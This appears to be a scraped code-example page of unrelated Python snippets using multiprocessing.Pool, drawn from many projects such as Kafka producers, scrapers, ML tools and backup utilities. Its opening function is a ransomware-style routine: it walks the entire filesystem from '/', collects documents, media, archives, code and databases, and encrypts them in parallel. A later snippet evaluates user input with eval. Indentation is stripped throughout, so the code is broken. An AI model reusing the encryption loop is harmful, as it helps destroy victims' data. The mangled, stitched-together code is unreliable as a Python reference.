def select_files():
ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe",
".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
".gif", ".txt", ".py", ".pyc", ".jar", ".sql", ".bundle",
".sqlite3", ".html", ".php", ".log", ".bak", ".deb"]
files_to_enc = []
for root, dirs, files in os.walk("/"):
for file in files:
if file.endswith(tuple(ext)):
files_to_enc.append(os.path.join(root, file))
# Parallelize execution of encryption function over four subprocesses
pool = Pool(processes=4)
pool.map(single_arg_encrypt_file, files_to_enc)
python类Pool()的实例源码
def get_best_servers(server_list, ping_attempts, valid_protocols):
manager = multiprocessing.Manager()
best_servers = manager.dict()
num_servers = len(server_list)
num_processes = get_num_processes(num_servers)
pool = multiprocessing.Pool(num_processes, maxtasksperchild=1)
pool.map(partial(compare_server, best_servers=best_servers, ping_attempts=ping_attempts, valid_protocols=valid_protocols), server_list)
pool.close()
return best_servers
def close(self):
try:
logger.debug("Starting to close pooled producer")
super(PooledKafkaProducer, self).close()
assert self.message_buffer_size == 0
logger.debug("Closing the pool")
self.pool.close()
logger.debug("Pool is closed.")
except:
logger.error("Exception occurred when closing pooled producer.")
raise
finally:
# The processes in the pool should be cleaned up in all cases. The
# exception will be re-thrown if there is one.
#
# Joining pools can be flaky in CPython 2.6, and the message buffer
# size is zero here, so terminating the pool is safe and ensure that
# join always works.
self.pool.terminate()
self.pool.join()
def download_chapter_m(self):
'''
???????????
Download all pages of the chapter using multiprocessing
'''
results=[]
if not self.pages:
print('No page')
return None
mp=Pool(min(8,max(cpu_count(),4)))
for page in self.pages:
results.append(mp.apply_async(self.download_page,(page,)))
mp.close()
mp.join()
num=sum([result.get() for result in results])
print('Downloaded {} pages'.format(num))
def main():
global ARGS
parser = argparse.ArgumentParser(description='Run a PyWebRunner YAML/JSON script.')
parser.add_argument('-b', '--browser', help='Which browser to load. Defaults to Chrome.')
parser.add_argument('--base-url', help='Base URL to use with goto command.')
parser.add_argument('-t', '--timeout', help='Global wait timeout (in seconds). Defaults to 30.')
parser.add_argument('-p', '--processes', help='Number of processes (browsers) to use. Defaults to 1')
parser.add_argument('-do', '--default-offset', help='New default offset for scroll_to_element. (Default is 0)')
parser.add_argument('--errors', dest='errors', action='store_true', help='Show errors.')
parser.add_argument('--focus', dest='focus', action='store_true', help='Focus the browser on launch.')
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', help='Verbose output of commands being executed.')
parser.add_argument('files', nargs='*')
ARGS = parser.parse_args()
processes = ARGS.processes or 1
pool = Pool(int(processes))
pool.map(run_test, ARGS.files)
pool.close()
pool.join()
def multiprocess_find_blocks(profiles, window, n_blocks=None,
block_size=None, n_jobs=-1):
"""Find blocks in profiles (parallel version)."""
intervals = compute_intervals(
size=len(profiles), n_blocks=n_blocks, block_size=block_size)
if n_jobs == -1:
pool = mp.Pool()
else:
pool = mp.Pool(n_jobs)
results = [apply_async(pool, serial_find_blocks,
args=(dict(profiles.items()[start:end]),
window))
for start, end in intervals]
dicts = [p.get() for p in results]
pool.close()
pool.join()
blocks = {k: v for d in dicts for k, v in d.items()}
return blocks
def townsend_lombscargle_wrapper(task):
'''
This wraps the function above for use with mp.Pool.
task[0] = times
task[1] = mags
task[2] = omega
'''
try:
return townsend_lombscargle_value(*task)
# if the LSP calculation fails for this omega, return a npnan
except Exception as e:
return npnan
def calculate(self, *, equation : str):
'''Calculator'''
#_equation = re.sub("[^[0-9]+-/*^%\.]", "", equation).replace('^', "**") #words
replacements = {"pi" : "math.pi", 'e' : "math.e", "sin" : "math.sin", "cos" : "math.cos", "tan" : "math.tan", '^' : "**"}
allowed = set("0123456789.+-*/^%()")
for key, value in replacements.items():
equation = equation.replace(key, value)
equation = "".join(character for character in equation if character in allowed)
print("Calculated " + equation)
with multiprocessing.Pool(1) as pool:
async_result = pool.apply_async(eval, (equation,))
future = self.bot.loop.run_in_executor(None, async_result.get, 10.0)
try:
result = await asyncio.wait_for(future, 10.0, loop = self.bot.loop)
await self.bot.embed_reply("{} = {}".format(equation, result))
except discord.errors.HTTPException:
await self.bot.embed_reply(":no_entry: Output too long")
except SyntaxError:
await self.bot.embed_reply(":no_entry: Syntax error")
except ZeroDivisionError:
await self.bot.embed_reply(":no_entry: Error: Division by zero")
except (concurrent.futures.TimeoutError, multiprocessing.context.TimeoutError):
await self.bot.embed_reply(":no_entry: Execution exceeded time limit")
def get_all_features_m(data):
"""
returns a vector with extraced features
:param data: datapoints x samples x dimensions (dimensions: EEG,EMG, EOG)
"""
p = Pool(3)
t1 = p.apply_async(feat_eeg,(data[:,:,0],))
t2 = p.apply_async(feat_eog,(data[:,:,1],))
t3 = p.apply_async(feat_emg,(data[:,:,2],))
eeg = t1.get(timeout = 1200)
eog = t2.get(timeout = 1200)
emg = t3.get(timeout = 1200)
p.close()
p.join()
return np.hstack([eeg,emg,eog])
def create_kernels(concurrency, parallel=False):
kernel_ids = []
times_taken = []
if parallel:
pool = multiprocessing.Pool(concurrency)
results = pool.map(run_create_kernel, range(concurrency))
for t, kid in results:
times_taken.append(t)
kernel_ids.append(kid)
else:
for _idx in range(concurrency):
t, kid = run_create_kernel(_idx)
times_taken.append(t)
kernel_ids.append(kid)
print_stat('create_kernel', times_taken)
return kernel_ids
def execute_codes(kernel_ids, parallel=False):
times_taken = []
if parallel:
pool = multiprocessing.Pool(len(kernel_ids))
results = pool.map(run_execute_code, kernel_ids)
for t in results:
if t is not None:
times_taken.append(t)
else:
for kid in kernel_ids:
t = run_execute_code(kid)
if t is not None:
times_taken.append(t)
print_stat('execute_code', times_taken)
def restart_kernels(kernel_ids, parallel=False):
times_taken = []
if parallel:
pool = multiprocessing.Pool(len(kernel_ids))
results = pool.map(run_restart_kernel, kernel_ids)
for t in results:
if t is not None:
times_taken.append(t)
else:
for kid in kernel_ids:
t = run_restart_kernel(kid)
if t is not None:
times_taken.append(t)
print_stat('restart_kernel', times_taken)
def destroy_kernels(kernel_ids, parallel=False):
times_taken = []
if parallel:
pool = multiprocessing.Pool(len(kernel_ids))
results = pool.map(run_destroy_kernel, kernel_ids)
for t in results:
if t is not None:
times_taken.append(t)
else:
for kid in kernel_ids:
t = run_destroy_kernel(kid)
if t is not None:
times_taken.append(t)
print_stat('destroy_kernel', times_taken)
def __init__(self, manager, config, timer, base_dir, backup_dir, tailed_oplogs, backup_oplogs):
super(Resolver, self).__init__(self.__class__.__name__, manager, config, timer, base_dir, backup_dir)
self.tailed_oplogs = tailed_oplogs
self.backup_oplogs = backup_oplogs
self.compression_supported = ['none', 'gzip']
self.resolver_summary = {}
self.resolver_state = {}
self.running = False
self.stopped = False
self.completed = False
self._pool = None
self._pooled = []
self._results = {}
try:
self._pool = Pool(processes=self.threads(None, 2))
except Exception, e:
logging.fatal("Could not start oplog resolver pool! Error: %s" % e)
raise Error(e)
def __init__(self, manager, config, timer, base_dir, backup_dir, **kwargs):
super(Rsync, self).__init__(self.__class__.__name__, manager, config, timer, base_dir, backup_dir, **kwargs)
self.backup_location = self.config.backup.location
self.backup_name = self.config.backup.name
self.remove_uploaded = self.config.upload.remove_uploaded
self.retries = self.config.upload.retries
self.thread_count = self.config.upload.threads
self.rsync_path = self.config.upload.rsync.path
self.rsync_user = self.config.upload.rsync.user
self.rsync_host = self.config.upload.rsync.host
self.rsync_port = self.config.upload.rsync.port
self.rsync_ssh_key = self.config.upload.rsync.ssh_key
self.rsync_binary = "rsync"
self.rsync_flags = ["--archive", "--compress"]
self.rsync_version = None
self._rsync_info = None
self._pool = Pool(processes=self.threads())
def fit(self, X_train, y_train, X_test=None, y_test=None):
"""
"""
if (X_test is None) and (y_test is None):
X_test = X_train
y_test = y_train
elif (X_test is None) or (y_test is None):
raise MissingValueException("Need to provide 'X_test' and 'y_test'")
fun = partial(objective, deepcopy(self.model),
deepcopy(self.model_module),
deepcopy(self.eval_func),
X_train, y_train, X_test, y_test)
pool = Pool(self.n_jobs)
scores = pool.map(fun, deepcopy(self.grid))
self.hyperparam_history = scores
best_params, best_model = self.get_best_params_and_model()
return best_params, best_model
def __call__(self, process_func):
def wrapper(*args):
data_obj = args[1]
if (len(data_obj.shape) <= self.input_dim
or data_obj.shape[-1] == 1):
return process_func(*args)
else:
pool = mp.Pool(mp.cpu_count())# TODO: make configurable
arglist = [
(args[0],) +
(data_obj[...,i],) +
args[2:]
for i in range(data_obj.shape[-1])
]
result = pool.map(self.worker, arglist)
if self.output_dim > self.input_dim: # expanding
return np.stack(result, -1)
else: # contracting
return np.concatenate(result, -1)
return wrapper
def _multitest_binary_pov(self, pov_path, cb_path, enable_randomness, debug, bitflip, timeout, times):
pool = Pool(processes=4)
res = [pool.apply_async(self._test_binary_pov,
(pov_path, cb_path, enable_randomness, debug, bitflip, timeout))
for _ in range(times)]
results = [ ]
for r in res:
try:
results.append(r.get(timeout=timeout + 5))
except TimeoutError:
results.append(False)
return results
sort_counter_mp.py 文件源码
项目:Software-Architecture-with-Python
作者: PacktPublishing
项目源码
文件源码
阅读 21
收藏 0
点赞 0
评论 0
def batch_files(pool_size, limit):
""" Create batches of files to process by a multiprocessing Pool """
batch_size = limit // pool_size
filenames = []
for i in range(pool_size):
batch = []
for j in range(i*batch_size, (i+1)*batch_size):
filename = 'numbers/numbers_%d.txt' % j
batch.append(filename)
filenames.append(batch)
return filenames
def __init__(self, map_func, reduce_func, num_workers=None):
"""
map_func
Function to map inputs to intermediate data. Takes as
argument one input value and returns a tuple with the
key and a value to be reduced.
reduce_func
Function to reduce partitioned version of intermediate
data to final output. Takes as argument a key as
produced by map_func and a sequence of the values
associated with that key.
num_workers
The number of workers to create in the pool. Defaults
to the number of CPUs available on the current host.
"""
self.map_func = map_func
self.reduce_func = reduce_func
self.pool = multiprocessing.Pool(num_workers)
def multi_scrub_text(reviews):
'''
Function to lemmatize text - utilizes multiprocessing for parallelization
INPUT:
reviews: array-like, pandas DataFrame column containing review texts
OUTPUT:
lemmatized: pandas DataFrame column with cleaned texts
'''
lemmatized = []
cpus = cpu_count() - 1
pool = Pool(processes=cpus)
lemmatized = pool.map(lemmatize_text, reviews)
pool.close()
pool.join()
return lemmatized
def multi_core_scrape(num_pages, db_coll):
'''
Map the API scrape across number of processors - 1 for performance boost.
INPUT:
num_pages: int, number of pages to scrape
db_coll: pymongo collection object, collection to add documents to
OUTPUT:
None, records inserted into MongoDB
'''
cpus = cpu_count() - 1
pool = Pool(processes=cpus)
pages = range(1, num_pages + 1)
employers = pool.map(scrape_api_page, pages)
pool.close()
pool.join()
print 'Inserting Employer Records into MongoDB . . .'
pbar = ProgressBar()
for page in pbar(employers):
db_coll.insert_many(page)
def predict_tf_all(path = None):
result_list = []
p = m_Pool(31)
result_list = p.map(predict_tf_once,range(1,32))
p.close()
p.join()
print 'writing...'
result_df = pd.DataFrame(index = range(1))
for day,result in result_list:
day_s = str(day)
if len(day_s)<=1:
day_s = '0'+day_s
result_df['201610'+day_s] = result
result_df = result_df.T
result_df.columns = ['predict_power_consumption']
if path == None:
date = str(pd.Timestamp(time.ctime())).replace(' ','_').replace(':','_')
path = './result/'+date+'.csv'
result_df.to_csv(path,index_label='predict_date')
l = map(lambda day:pd.DataFrame.from_csv('./result/predict_part/%d.csv'%day),range(1,32))
t = pd.concat(l)
t.to_csv('./result/predict_part/'+date+'.csv')
def make_month_features_all():
pw_df_list = []
dataset = get_dataset()
dataset.power_consumption = dataset.power_consumption.apply(np.log)
for user_id in get_user_id_list():
print user_id
if not check_empty(user_id):
user_df = filter_user_id(dataset,user_id).resample('1D').mean().fillna(0)
#add to list
pw_df_list.append((user_id,user_df))
#make_features(user_id,user_df)
p = m_Pool(64)
for arg in pw_df_list:
#p.apply_async(make_features,args=(arg))
p.apply_async(make_month_features,args=(arg))
print 'Waiting for all subprocesses done...'
p.close()
p.join()
def make_history_month_features_all():
pw_df_list = []
dataset = get_dataset()
dataset.power_consumption = dataset.power_consumption
for user_id in get_user_id_list():
print user_id
if not check_empty(user_id):
user_df = filter_user_id(dataset,user_id).resample('1D').mean().fillna(1)
#add to list
pw_df_list.append((user_id,user_df))
#make_features(user_id,user_df)
p = m_Pool(64)
for arg in pw_df_list:
p.apply_async(make_history_month_features,args=(arg))
print 'Waiting for all subprocesses done...'
p.close()
p.join()
def _reset(self):
'''
Set up some book-keeping variables for optimization. Don't call this
manually.
'''
# Set up some variables for book-keeping
self.epoch = 0
self.best_val_acc = 0
self.best_params = {}
self.loss_history = []
self.val_acc_history = []
self.train_acc_history = []
self.pbar = None
# Make a deep copy of the optim_config for each parameter
self.optim_configs = {}
self.params, self.grad_params = self.model.get_parameters()
# self.weights, _ = self.model.get_parameters()
for p in range(len(self.params)):
d = {k: v for k, v in self.optim_config.iteritems()}
self.optim_configs[p] = d
self.multiprocessing = bool(self.num_processes-1)
if self.multiprocessing:
self.pool = mp.Pool(self.num_processes, init_worker)
def classify(self,X,Y, use_normalized=True, mask=None):
if self._use_whitened_similarity:
self.precompute_marginals()
self._pool = Pool(initializer=init_worker, initargs=(self._num_instances,
self._conv_param.kernel_h, self._conv_param.kernel_w, self._conv_param.pad[0],
self._conv_param.stride[0], self._im2col_indices, self._pdfs))
probs, preds = self.collect_probs(X, Y, use_normalized, mask=mask)
self._prob_mat = probs
self._Y_hat = preds
self._Y = Y
self._tested = True
if self._use_whitened_similarity:
self._pool.close()
self._pool.join()
self._pool = None
self._pdfs = None
def runBlast(fastaFilePath,blastFilePath,blastCLine,numThreads):
'''Run blast comparing every database against every other in
fastaFilePath. Save to the directory indicated by blastFilePath, using
the blast parameters in blastCLine.'''
# format the databases
dbFileL=glob.glob(fastaFilePath)
formatDb(dbFileL)
# create blast directory
# if directory for blast doesn't exist yet, make it
blastDir = blastFilePath.split("*")[0]
if glob.glob(blastDir)==[]:
os.mkdir(blastDir)
clineL = makeBlastClineList(dbFileL,fastaFilePath,blastFilePath,blastCLine)
p=Pool(numThreads)
stderrL = p.map(subprocessWrapper, clineL)
return
step3_preprocess_validation.py 文件源码
项目:TC-Lung_nodules_detection
作者: Shicoder
项目源码
文件源码
阅读 29
收藏 0
点赞 0
评论 0
def process_images(delete_existing=False, only_process_patient=None):
if delete_existing and os.path.exists(settings.VALIDATION_EXTRACTED_IMAGE_DIR):
print("Removing old stuff..")
if os.path.exists(settings.VALIDATION_EXTRACTED_IMAGE_DIR):
shutil.rmtree(settings.VALIDATION_EXTRACTED_IMAGE_DIR)
if not os.path.exists(settings.VALIDATION_EXTRACTED_IMAGE_DIR):
os.mkdir(settings.VALIDATION_EXTRACTED_IMAGE_DIR)
# os.mkdir(settings.VALIDATION_EXTRACTED_IMAGE_DIR + "_labels/")
for subject_no in range(settings.VAL_SUBSET_START_INDEX, settings.VAL_SUBSET_TRAIN_NUM):
src_dir = settings.RAW_SRC_DIR + "val_subset0" + str(subject_no) + "/"
src_paths = glob.glob(src_dir + "*.mhd")
if only_process_patient is None and True:
pool = multiprocessing.Pool(8)
pool.map(process_image, src_paths)
else:
for src_path in src_paths:
print(src_path)
if only_process_patient is not None:
if only_process_patient not in src_path:
continue
process_image(src_path)
step1_preprocess_train.py 文件源码
项目:TC-Lung_nodules_detection
作者: Shicoder
项目源码
文件源码
阅读 28
收藏 0
点赞 0
评论 0
def process_images(delete_existing=False, only_process_patient=None):
if delete_existing and os.path.exists(settings.TRAIN_EXTRACTED_IMAGE_DIR):
print("Removing old stuff..")
if os.path.exists(settings.TRAIN_EXTRACTED_IMAGE_DIR):
shutil.rmtree(settings.TRAIN_EXTRACTED_IMAGE_DIR)
if not os.path.exists(settings.TRAIN_EXTRACTED_IMAGE_DIR):
os.mkdir(settings.TRAIN_EXTRACTED_IMAGE_DIR)
os.mkdir(settings.TRAIN_EXTRACTED_IMAGE_DIR + "_labels/")
for subject_no in range(settings.TRAIN_SUBSET_START_INDEX, settings.TRAIN_SUBSET_TRAIN_NUM):
src_dir = settings.RAW_SRC_DIR + "train_subset0" + str(subject_no) + "/"
src_paths = glob.glob(src_dir + "*.mhd")
if only_process_patient is None and True:
pool = multiprocessing.Pool(6)
pool.map(process_image, src_paths)
else:
for src_path in src_paths:
print(src_path)
if only_process_patient is not None:
if only_process_patient not in src_path:
continue
process_image(src_path)